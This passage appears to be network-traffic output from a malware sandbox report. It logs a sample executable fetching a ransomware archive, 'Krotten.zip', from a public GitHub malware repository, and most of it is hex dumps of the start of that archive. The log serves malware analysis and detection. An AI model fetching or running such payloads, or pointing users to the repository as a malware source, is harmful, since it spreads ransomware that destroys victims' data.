                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    3192.168.2.34970823.50.105.163443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:45 UTC187OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                    2022-09-29 12:58:45 UTC188INHTTP/1.1 200 OK
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                    X-Azure-Ref: 07xA1YwAAAAANlFLDDfUFRpn0EiXpbHv1TE9OMjFFREdFMTgyMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                    Cache-Control: public, max-age=224985
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:45 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    X-CID: 2


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    30140.82.121.3443192.168.2.349722C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:54 UTC1340INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:19 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:54 UTC1340INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    31192.168.2.349723185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:54 UTC1342OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    32185.199.108.133443192.168.2.349723C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:54 UTC1342INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 26359
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "b4c9a9caad9a8cc039faac50748e91b4ea099c21f7a0b4b606256ae51df449bc"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 080E:67C0:101BE30:11154D1:6335932F
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:54 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6936-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456335.735781,VS0,VE158
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 15b7227e6b20ab240bc4c2f190f6e9316140682e
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:54 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:58:54 UTC1343INData Raw: 50 4b 03 04 33 00 01 00 63 00 cf a3 e4 38 00 00 00 00 2f 66 00 00 29 d5 00 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4b 72 6f 74 74 65 6e 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 51 1f 85 1c 8b 3e 2c 09 fa d6 8a ea d4 7d 01 2f 41 8d 8b 07 f0 fd bb 72 93 3d 0e ed 40 4e 7a 13 95 d4 dd 52 47 43 5a fe 98 0e 0e 17 7b 8d 0b 48 2a e1 a6 38 9c 0d 69 c0 a2 4e b7 13 22 57 2e 2b 04 a2 0e 40 b8 3b 45 f0 af 7f 66 fa c6 fd 85 22 c0 6c 99 74 ef 66 9e f4 72 6a d9 dc 4d 40 bf 11 c6 56 7f 5a ef ee 2f ee 69 5e 5a 83 44 c1 e1 ac 9e 0d 4a 58 19 bc d5 4a ed 6d 0f 35 24 46 b4 51 93 93 a8 4a d0 a7 d9 78 fe 72 46 e5 ea dd ae 9f d1 96 48 23 2c 3a 7f d8 74 27 ef d1 37 1b d5 be bd 4a 4b 51 4a c2 83 3d a5 d6 81 75 5c f0 dc 4d 2c f1 64 1c 28 3c 89 b5 e7 cd 2c 29 bf 64 4a f0
                                                                                                                                                    Data Ascii: PK3c8/f)Endermanch@Krotten.exeAEQ>,}/Ar=@NzRGCZ{H*8iN"W.+@;Ef"ltfrjM@VZ/i^ZDJXJm5$FQJxrFH#,:t'7JKQJ=u\M,d(<,)dJ
                                                                                                                                                    2022-09-29 12:58:54 UTC1344INData Raw: 7e 07 d3 91 36 cc 6c 5d e7 86 c4 bb 68 42 cb 46 fd 3d 53 ef 9a 53 c0 07 a2 a2 fb 2d 2a 97 b1 11 17 27 a3 e2 cd e6 8b 85 1d b8 5e 1d 76 5f f8 48 bb 13 ea 13 88 ed e9 39 9b e4 4f 1d 5b 57 77 14 89 a3 33 0d cd 2d 1c a3 b3 8f 4a fb 61 14 c1 c0 39 92 61 fb ba ad 73 31 0e 78 fb 55 f8 ea e5 36 47 f5 37 b6 48 f6 3b 4f 2f 13 bc 87 5e bb f9 a8 84 93 8b 7f aa e9 ba c2 df 48 f0 a1 09 4c f2 2b c0 26 c3 ec ad 2b 27 48 54 35 3e e4 a1 2f 4a f1 e5 3e 63 45 93 59 ee c1 17 10 cf b7 0a 01 bb 2f 3e 40 e2 96 e7 96 1a 65 42 0d b5 43 d2 26 07 82 cd df 4d 59 00 b3 27 c4 5b 05 2d ba 78 12 48 47 84 96 1e 22 12 c6 b7 9a da 78 5f 2a 58 63 aa ab 3e 4c 26 88 77 b3 73 e9 78 ad 2e 31 a3 8d 09 c2 64 6e 25 01 35 42 06 f8 72 fb 72 b0 c2 ea 64 0b a0 18 d6 f5 0e 30 3d a2 29 67 9c d9 e2 58 45
                                                                                                                                                    Data Ascii: ~6l]hBF=SS-*'^v_H9O[Ww3-Ja9as1xU6G7H;O/^HL+&+'HT5>/J>cEY/>@eBC&MY'[-xHG"x_*Xc>L&wsx.1dn%5Brrd0=)gXE
                                                                                                                                                    2022-09-29 12:58:54 UTC1346INData Raw: ae 9b f4 c8 3e 7a 74 41 7b b8 2e ef b9 95 a5 e1 52 93 e0 18 af 7b b9 ea ba 7b 09 b8 17 56 3d a0 ca 02 f9 9b 23 a6 23 9e 8c 82 2a 51 2d ae fa eb 89 45 7d 46 5a 53 57 b8 c1 6d 3e 2f e7 2c 0f 04 0a 5b 12 53 71 4f 7d 32 3a 8f 94 81 58 12 b4 7e de 48 b5 d8 5e 26 a8 29 8c f2 e7 dd 9e 5c 9b 12 97 03 2f a5 aa ae a6 44 c9 8c 27 5e 3d 44 7f 98 c1 7d b7 eb 24 f4 de 5c bb b7 0e 9a 9b 9b 01 dd 79 93 79 ed 98 38 ee 61 5f aa fe bb 18 d8 3d 45 53 62 54 d1 13 69 5f 7e 2b 69 18 e8 13 16 e4 87 29 83 8f 25 c0 a9 31 16 a8 65 7f 4c 60 16 f1 7e f1 84 12 21 9c eb 16 48 d2 71 8e 2d 24 2e 5b 04 a5 15 05 54 ed 5a 03 e5 b6 e8 b5 fb ab b6 69 c6 44 53 36 d5 c4 68 3c 7c 15 85 3c ef 6d 35 c6 12 10 a5 a8 c2 57 32 ac eb 19 32 2a dd 65 ad ef ab 60 5c 7e a3 75 bb c1 75 12 5b 8a e6 78 62 14
                                                                                                                                                    Data Ascii: >ztA{.R{{V=##*Q-E}FZSWm>/,[SqO}2:X~H^&)\/D'^=D}$\yy8a_=ESbTi_~+i)%1eL`~!Hq-$.[TZiDS6h<|<m5W22*e`\~uu[xb
                                                                                                                                                    2022-09-29 12:58:54 UTC1347INData Raw: 63 53 b5 5a bd a6 44 ed d9 02 99 fd 6d 6d ab 31 2c 4d bc f8 f9 95 69 f6 43 4b 13 52 40 19 68 1c b0 8c e2 5a 3a f6 88 cc c7 c6 c8 71 72 db 85 65 79 a0 88 1c 80 52 78 5b 2d dd 51 d6 7f 1d 38 2d d3 5b 59 42 3b f4 13 9d 5c 5d 72 ae 9d eb 83 7c 49 15 9f a8 14 1b 11 da 86 cb a4 f9 88 40 ac dc 36 33 46 30 9a 6e a6 77 18 db 85 67 b2 59 0d a1 be 95 ac 10 10 a4 b7 18 9d e1 0a c5 f8 66 34 91 d0 be f5 c7 25 79 26 b6 65 28 29 29 99 e4 46 c4 88 3e ce 9c 57 ff 55 a8 80 fe 7f fd 7c 98 22 2b 0c 6f d1 cc 8f ec 1c 6c fc c5 e7 86 f8 30 94 c8 d2 bd 71 93 63 53 1c 20 5d 85 ed dc 9f 63 68 db 93 bc 04 40 b0 b5 3c 33 54 17 f8 ea 5c 74 6a 62 3b ab a2 30 36 df 5a 6b df 31 b7 c3 7e 60 ae e4 11 7c d3 d6 8b 46 b1 b7 39 f1 8e 30 4f 4f 1d fa 7a e1 0b 66 74 50 05 fe 6c a9 34 e8 2d 6a 5d
                                                                                                                                                    Data Ascii: cSZDmm1,MiCKR@hZ:qreyRx[-Q8-[YB;\]r|I@63F0nwgYf4%y&e())F>WU|"+ol0qcS ]ch@<3T\tjb;06Zk1~`|F90OOzftPl4-j]
                                                                                                                                                    2022-09-29 12:58:54 UTC1348INData Raw: f5 a8 e8 97 c4 0b fe 16 47 d3 16 f6 3a 4f 3b 1c d2 7e 95 8d 8e 11 45 2a 99 15 52 4a c4 71 73 a9 d6 e3 4e 2b a9 78 b3 c5 19 0f ea da 8c 7e e2 e1 75 2e cb e0 4a 03 90 4e 4a a3 9c be 32 22 b2 b8 14 8d fb 10 64 57 4e ae 9f ad 68 fc 78 f9 ca 1f b6 91 ca 2f 0f 5c a4 0c 9a cf 28 74 c9 b8 bb 29 06 db 9a 57 ae 02 18 e5 2b 4f 1c 67 68 f0 5c ee 75 50 2a ee 4a 88 f8 d1 d1 53 8d 23 83 b5 dd 06 61 05 0c 53 e3 a8 92 b2 87 61 f8 f7 c4 58 44 f9 ab 63 b8 2f 84 4d e1 96 55 0f 91 a9 93 5b 57 24 8b dc 32 55 7c 58 b9 04 7a 1a e7 e3 05 2a c1 4b 10 92 2b 70 49 49 5f 46 d1 49 8e c0 61 47 58 4a f1 10 2a 27 a2 e8 1c 68 f9 72 8d 98 93 a8 78 65 8e c1 d5 3f d1 95 f9 16 a0 50 ba a0 f1 dd 58 fd 1c 2a 0d 08 94 13 2f 00 2e 59 f8 17 f2 b3 d2 6c dd 48 6c 60 0e f7 69 40 4f a8 a3 6a a2 ea 2c
                                                                                                                                                    Data Ascii: G:O;~E*RJqsN+x~u.JNJ2"dWNhx/\(t)W+Ogh\uP*JS#aSaXDc/MU[W$2U|Xz*K+pII_FIaGXJ*'hrxe?PX*/.YlHl`i@Oj,
                                                                                                                                                    2022-09-29 12:58:54 UTC1350INData Raw: ba 77 e6 2f d6 40 2b 3a c1 10 19 77 c3 68 7f d4 d8 45 87 3c d6 57 f7 ec 4a d5 22 af 4e f8 57 c0 27 85 f5 df 71 1b b8 86 72 f0 d7 e8 69 db 35 76 2f ab ad 22 d7 be 42 85 02 6e 01 ac 30 c4 0b e7 a3 fa ef b1 e9 08 b9 a1 2d 2d 1b e7 18 57 f9 cc 25 5d 9b 96 81 bc 22 13 0a db 67 3d 05 e2 85 0b 4b 29 b6 7d 64 33 99 b2 71 e0 33 ba 56 7a ef 26 80 3c dd b1 b1 d3 cc d8 20 b7 3c 7e 97 e3 c1 ed a9 aa a0 fa d7 7f fc b0 2a 94 79 29 28 fa 3a a7 85 7d 7e f8 3d 2d ee 4e 1a 51 20 c6 22 75 56 77 ef e2 62 e0 05 7f 4c 66 b1 bf eb 6b 33 fe 39 e9 7e e3 eb 62 ce db 96 59 34 96 ac 7e 89 af 4c 57 a4 57 89 bb b0 cb 2a b8 35 e8 1f 37 68 b9 3a 91 80 aa be de f9 e4 67 8a a8 01 7a c4 81 7f cc 63 47 60 d5 20 10 bb ae c6 30 98 bc b1 e6 0e 64 60 62 63 a0 ee 94 f9 97 77 52 da dd 0c 2d 6a 6a
                                                                                                                                                    Data Ascii: w/@+:whE<WJ"NW'qri5v/"Bn0--W%]"g=K)}d3q3Vz&< <~*y)(:}~=-NQ "uVwbLfk39~bY4~LWW*57h:gzcG` 0d`bcwR-jj
                                                                                                                                                    2022-09-29 12:58:54 UTC1351INData Raw: e6 9c df 45 c9 81 e1 73 37 b0 b9 ee bf 4e 78 de ca cb 4c 4e cc e7 5d 75 ee 15 e9 94 8a 0d 0e 8a 83 83 7e 52 a2 17 35 f7 ff 3d 12 48 9e 38 cb 3c 1c d7 36 54 6a b4 c9 6c 2d c7 77 58 2b 60 ef 2d 09 43 26 d1 2f 6c b3 70 b3 d7 e5 7c 72 40 35 41 62 fd 85 d5 b8 5e ca 49 ff 22 eb cc 42 47 7d 91 08 5b 76 37 2a a7 c5 0d ff 9a a5 10 0c e6 6e e9 e5 b4 80 4c f5 32 cc b1 89 1c e8 72 fa b3 2a 7f 4c fc da 58 ae 76 51 6d a3 09 71 26 ff b2 a6 f4 bc 77 77 92 27 3d c2 64 9b 0d 0e be bc 21 54 6e 9c 7d 0c 93 3f 39 e9 0f 86 9c 08 87 6e b5 33 8a 1c d9 f7 44 1f 16 40 3e 22 fb a1 84 97 d5 c7 fb 11 c7 a7 07 9f ad b4 97 5c 4d bc 58 dc 0b 0c c8 a7 7c 1b d4 aa 61 56 78 81 78 94 e6 84 9d 1a 7a b8 2e fe 9f ab 08 a2 fe f6 2d 53 ee 45 34 40 b7 59 ee c8 f2 6a ae cc cb ad d7 28 70 08 01 77
                                                                                                                                                    Data Ascii: Es7NxLN]u~R5=H8<6Tjl-wX+`-C&/lp|r@5Ab^I"BG}[v7*nL2r*LXvQmq&ww'=d!Tn}?9n3D@>"\MX|aVxxz.-SE4@Yj(pw
                                                                                                                                                    2022-09-29 12:58:54 UTC1352INData Raw: 3b 7f 40 3b d1 ff 3b 95 d0 c1 af ab fa cb a9 83 a6 ac f8 7f b2 1e a2 b3 72 4e cc fa bb d1 99 3f 90 a2 b2 10 c6 44 3c 53 d0 2a 28 26 f7 e1 65 28 c2 18 9d 41 5e b8 81 6c ac c5 83 15 09 00 62 bf e8 b5 03 57 75 05 ac ed d3 db 48 4e 7a 1f d8 11 73 e7 8f 72 19 8c 50 7a 52 27 d2 af d8 64 fe 67 9b cc c2 9e f4 a8 bd 13 41 7e ab 73 ff ed e1 af b7 eb 1d a9 31 43 ee ad c4 bc ab 2d 49 27 ee 80 3d c4 b7 45 dc c8 bf 8f 4c dc 86 50 ee fd 5f 65 9e 77 09 b5 d2 3a 22 39 f9 7f 26 6a a2 52 a6 39 0f 78 e3 64 69 9c 5e 4d 2a e5 23 cd 88 ff 51 43 e7 4d c4 a7 81 c1 66 f8 6c a4 a2 0d be 5d 59 a9 d9 c4 8d 5c 45 0f 40 3f 72 f7 66 8d ef f4 56 61 8d 29 4b db 3c b8 25 01 d8 54 c4 89 80 f8 da 4d cc fb c2 31 4d fe 33 bd ae bf 2b ff 99 45 8e b3 2a be b8 9f b7 63 c1 c2 50 72 fb 58 e8 24 e3
                                                                                                                                                    Data Ascii: ;@;;rN?D<S*(&e(A^lbWuHNzsrPzR'dgA~s1C-I'=ELP_ew:"9&jR9xdi^M*#QCMfl]Y\E@?rfVa)K<%TM1M3+E*cPrX$
                                                                                                                                                    2022-09-29 12:58:54 UTC1354INData Raw: 28 9b 60 1e 71 b8 90 ee e6 49 14 f3 4c 4a 84 4d 24 40 91 9b 4a c8 8a 32 04 2c 23 f2 a5 55 2c 3a aa 65 3e 2d d2 4e f9 de 40 b9 c2 98 2e f2 35 b1 e7 f9 fb b1 12 b3 ca b8 75 3e ab 61 b9 8b 73 9b 1a e0 57 f4 39 39 ba 5f 35 80 61 23 90 86 0e c4 2e e8 12 7d 89 5b ac 2e 27 0e 1c 33 76 67 be 99 31 ce 75 23 0d 55 eb 67 aa 91 2f bd 76 13 97 92 61 58 52 20 42 05 c4 20 2b 18 ec 4a 9f ba 42 70 93 9e 72 9e 75 7b 42 09 0e 09 50 fc 92 5e 95 05 f2 b3 f3 ec 94 7a 2d ea c1 05 07 99 d2 7c c2 0f 06 96 5b 48 13 e9 92 f4 8b 89 b3 9a 7c 26 a5 27 06 78 2a f2 a9 b7 02 18 2a f9 af 29 b4 42 be bf d9 b4 1f da da 22 2f 0e 7c 10 b4 76 fd c5 74 94 ac 39 04 9e ff 9a f5 c7 b1 9c 5c 97 34 92 b7 75 07 72 ec 1a 1f 1e 82 b2 e3 30 96 47 ba 11 ce e0 07 01 6e bb be 65 f2 7f fd b5 c3 d5 23 ce 8d
                                                                                                                                                    Data Ascii: (`qILJM$@J2,#U,:e>-N@.5u>asW99_5a#.}[.'3vg1u#Ug/vaXR B +JBpru{BP^z-|[H|&'x**)B"/|vt9\4ur0Gne#
                                                                                                                                                    2022-09-29 12:58:54 UTC1355INData Raw: c7 11 83 83 4a d7 2f 05 22 24 93 49 ef 67 7e 71 b7 11 82 b1 65 d9 e8 5c b9 f1 a0 5c b0 d2 9d e8 f0 a0 a3 b6 47 b0 39 68 91 ca f0 09 55 d8 bc 30 8d d3 99 af b8 86 0b 29 c8 e1 7b 72 4f 12 a5 23 32 65 ac 6c 52 67 9f ee 69 11 f6 57 a0 fd 2e 11 5d 91 cb ce 0f ba 60 65 4d ca 8b 93 b3 9b a1 9c 73 0b 1a 59 aa 66 c8 3b 43 6d bf 99 c4 e3 2a 1d 23 bd e5 85 de 96 b9 59 ba 21 74 09 22 2f 61 7d 8a b8 ea 4d 9c ac 15 5d 2d a3 85 61 b9 87 f4 16 54 88 93 e7 4e 9b 79 fb 79 25 9b 51 7d 00 e9 15 90 4d 90 a8 0b b5 28 43 05 34 1a ad 6e 2c f3 e3 ad 4a 76 1e e7 ec f4 2f 4d 6d 77 dc e1 03 19 ef 7a 47 9b a0 2d f3 64 a0 b0 71 6e f4 dc 97 80 f8 48 90 0b 07 7f dd 86 97 d4 a3 fa d4 0c 10 ff 9f e9 f6 48 1a 47 d0 7b 51 6a 30 53 3f 6f 81 8a 9c 0e e8 67 56 16 e8 6b 4f c7 85 35 c0 f3 5b 9c
                                                                                                                                                    Data Ascii: J/"$Ig~qe\\G9hU0){rO#2elRgiW.]`eMsYf;Cm*#Y!t"/a}M]-aTNyy%Q}M(C4n,Jv/MmwzG-dqnHHG{Qj0S?ogVkO5[
                                                                                                                                                    2022-09-29 12:58:54 UTC1356INData Raw: 77 8f 84 bc 58 35 a6 bb 88 b1 f0 db af e7 13 aa 31 8b cb bc 9f d7 06 04 7f 3c 6c 70 95 f0 80 fc 2d 7f 89 b3 52 fd df 59 3f c7 32 f4 8b ab 20 1a 82 83 29 d6 3e 64 7e 5a 61 f2 2d 31 66 e1 c6 20 8d 20 1c 4d f1 79 7c af 83 cf ac 52 d2 3d 4c 88 0f 06 e1 5a 9d b4 25 83 d2 d4 b5 72 e3 8a f7 63 88 67 a2 98 9e c5 0a bd 7c e1 5c 79 7a 55 f2 c1 12 89 08 68 14 41 9d 2e f6 27 ce fb 04 c3 9f b5 91 46 95 d8 e2 d7 24 de b9 f1 06 c0 e7 1a 49 35 66 05 90 4b ea b0 ad a9 c7 c9 2d fc d9 4e 92 83 37 94 92 46 9e 0f 46 33 6b c9 c9 1f b2 b6 0d 8c ba 5c 42 30 84 72 d2 91 ec 9b d8 bd 5d 9c 89 db fd 83 a9 60 44 a5 86 2d d9 cd b1 3b e4 71 5f 33 ce a8 8d be a3 37 3d f0 6f 4c 72 49 a4 1b 10 56 a3 3b ac ff cb b2 9a 8c 60 8d 51 20 05 9d 2e 29 46 f1 b8 8f 41 1c 11 59 85 8b 74 20 97 0f 1a
                                                                                                                                                    Data Ascii: wX51<lp-RY?2 )>d~Za-1f My|R=LZ%rcg|\yzUhA.'F$I5fK-N7FF3k\B0r]`D-;q_37=oLrIV;`Q .)FAYt
                                                                                                                                                    2022-09-29 12:58:54 UTC1358INData Raw: 9c 6d f9 e7 6a 05 78 60 43 3a ae 4f c8 bd d4 99 fd 43 25 bb 0c 43 ce 48 67 45 23 bd 54 ed 8b 01 b0 2b 2d 16 56 55 a5 bb 5b 09 1b ca 3c 84 d9 3a af 4d ae 6c 80 a4 53 18 ea fc 3e fe 7c 59 a4 1d 5f 33 aa 13 67 82 b4 b9 b1 bf 28 19 71 1b 8a 00 16 19 1f b2 20 fa 2c 6a 68 77 e5 96 dc fc 38 76 0e 91 72 c6 fb 40 5c ef 1a ed 71 42 1d e2 23 47 17 13 35 36 ae 59 9b 79 56 b7 64 84 0b 27 53 d4 7c d7 4c bc 92 89 2a bb b4 4b 8b c1 0a 37 4b 06 50 05 1e 8c 9a 41 c7 95 50 4d 16 62 5b 53 d7 d4 c5 61 b3 03 ee 8e 90 d9 81 ff b1 b9 48 86 43 a5 6a 5e ee 47 da a4 b9 6f df d5 8c 61 3d 0a a2 8f 95 c4 5b 58 e4 02 2b 8f ec 45 01 7c d1 99 5a 40 5f 85 5d 4f 3d 31 39 62 0b dc 6f 1b 2b d6 75 c0 c1 b1 ac 30 cc af f7 8a ca 2d 87 70 d0 22 83 21 b6 55 85 86 09 f2 91 bf 93 05 7f 7d f2 ac 4b
                                                                                                                                                    Data Ascii: mjx`C:OC%CHgE#T+-VU[<:MlS>|Y_3g(q ,jhw8vr@\qB#G56YyVd'S|L*K7KPAPMb[SaHCj^Goa=[X+E|Z@_]O=19bo+u0-p"!U}K
                                                                                                                                                    2022-09-29 12:58:54 UTC1358INData Raw: d4 89 4f 0e 02 30 8e 80 58 34 85 06 20 67 88 7a 4a 60 ca 65 1f 4a d8 fc 72 0c 7e 6d 05 1b e6 95 51 87 a3 00 48 ea 75 49 f2 20 59 3b 74 55 08 be e1 b4 90 82 8d d2 6d 2b 50 02 f8 12 c4 5d 62 44 23 be a5 01 03 31 ac 33 53 68 bd 4d e1 66 c1 cc b6 95 16 c5 1f dc 49 61 02 aa e5 aa 82 d4 e6 59 8e c1 cc 54 90 c6 be d7 0a 0c 2f 6a e7 98 31 23 fc 36 83 21 a8 e4 31 ea eb c7 42 47 03 bb 62 db 44 d2 e7 6d 8f 1f 52 fc 20 a8 a0 1d 00 ae 69 03 90 e9 88 d6 f3 52 4f a7 3c f3 22 6f e4 a0 94 1c 08 d4 bb 00 5e d6 2e e5 ab 8e d6 04 d1 24 95 2d 51 49 97 5b 19 3a d7 c0 2f 33 fe 25 23 5c a3 2a bb 20 cb d5 ea 09 ca 48 b0 25 04 c0 18 f7 e6 b5 17 35 9e 40 a9 63 8c 00 cf f5 d5 c0 2b 87 b4 5f 72 4f 0a 62 4c c6 cf 7c 71 bf 5c 88 0d ae 14 25 04 24 7b 55 91 b7 44 67 fc 75 6b 08 d3 4a b6
                                                                                                                                                    Data Ascii: O0X4 gzJ`eJr~mQHuI Y;tUm+P]bD#13ShMfIaYT/j1#6!1BGbDmR iRO<"o^.$-QI[:/3%#\* H%5@c+_rObL|q\%${UDgukJ
                                                                                                                                                    2022-09-29 12:58:54 UTC1359INData Raw: 45 dd c7 f0 a9 f7 87 06 13 35 ad c2 9b 66 ed 16 a6 ad c9 76 77 ec 46 64 1f 00 4d 8a ca 25 d1 f2 af 47 e2 f1 63 2a 75 ed af 71 73 4d 75 d6 f9 77 7c 22 28 26 44 91 86 9d fd 1b db 54 26 8c d7 22 e5 a6 f9 b6 7c 66 09 0f 76 27 ae fc 3b 6b c2 f0 61 52 54 3a af cf 86 4d 02 b3 69 17 0e 4f 5b 15 2d b6 dd d6 67 75 2d f1 28 f1 b1 fb bd a0 8e 23 8d 5f 1c f0 fa e2 82 a0 db 70 56 7a 3b 54 e5 cf b5 ad b3 eb 37 5e b6 79 b6 a7 e2 19 2a 14 0f 1b 19 14 8b 8c d4 1b 6b 34 6a 67 51 95 50 58 09 ef 5f 36 c7 0b d5 e5 9d 76 f7 5a d2 f7 4a 24 51 d4 0c 0d e7 e5 6b 60 46 65 8a a6 b4 a1 0b 31 a7 2b b3 2d 9d a1 ab 3f c6 75 15 e8 1d 39 b8 07 85 42 c8 5b 8b 78 95 73 d8 9f 8b 86 dc fc 72 28 4d d1 e8 c0 1f ff a7 8e bc 6d 2a 9c 75 47 ef 9f d3 a2 15 5a 4b 91 7a 99 a9 dd 58 f5 ef 3e f9 f5 a4
                                                                                                                                                    Data Ascii: E5fvwFdM%Gc*uqsMuw|"(&DT&"|fv';kaRT:MiO[-gu-(#_pVz;T7^y*k4jgQPX_6vZJ$Qk`Fe1+-?u9B[xsr(Mm*uGZKzX>
                                                                                                                                                    2022-09-29 12:58:54 UTC1361INData Raw: 91 2c 43 dd be a8 19 69 ac fd 36 14 dd 41 cb de d8 c2 e4 8d 17 03 85 be 1e 44 84 98 f2 b3 06 cb 2e 88 77 34 ca 41 f3 83 c8 4c d0 1b 63 73 00 99 ff 6a fa d4 0d 72 de 4a b2 41 e0 c3 88 c5 2a 48 ce 28 d4 3a 7f 17 38 06 41 e4 0e 23 01 b1 18 43 06 39 b5 8b d2 74 4c 4d 3e da 3a f0 25 65 13 0e 18 ab b9 b0 bc 7f 0f d4 d3 cd 67 65 c6 9e cf 52 40 82 35 37 cf cb 28 dd 28 e2 e0 b1 d9 1f 77 03 c2 76 d0 de 31 ba a6 89 2e 71 cc ce 75 33 3b 80 f3 e8 2c ef 1c e0 d3 db 88 23 e1 b7 99 1d 45 9d 1f 26 f3 3f 6c 95 79 b1 85 85 e2 b7 95 17 7b c5 39 8a aa 48 3b 6b dc bb 8f 23 ac 9d 86 cb 97 2a 40 8f 48 0e 42 c3 82 36 19 7c 4e e3 b2 9f 51 7c 2c bf 18 0a 99 0a 33 99 99 13 84 7e 2b 86 f8 26 42 1b 72 9b 0c b6 d0 6d 29 55 b4 63 16 cf 06 87 75 10 31 2b e5 ba af d1 2e ec c8 ce 8b ab dc
                                                                                                                                                    Data Ascii: ,Ci6AD.w4ALcsjrJA*H(:8A#C9tLM>:%egeR@57((wv1.qu3;,#E&?ly{9H;k#*@HB6|NQ|,3~+&Brm)Ucu1+.
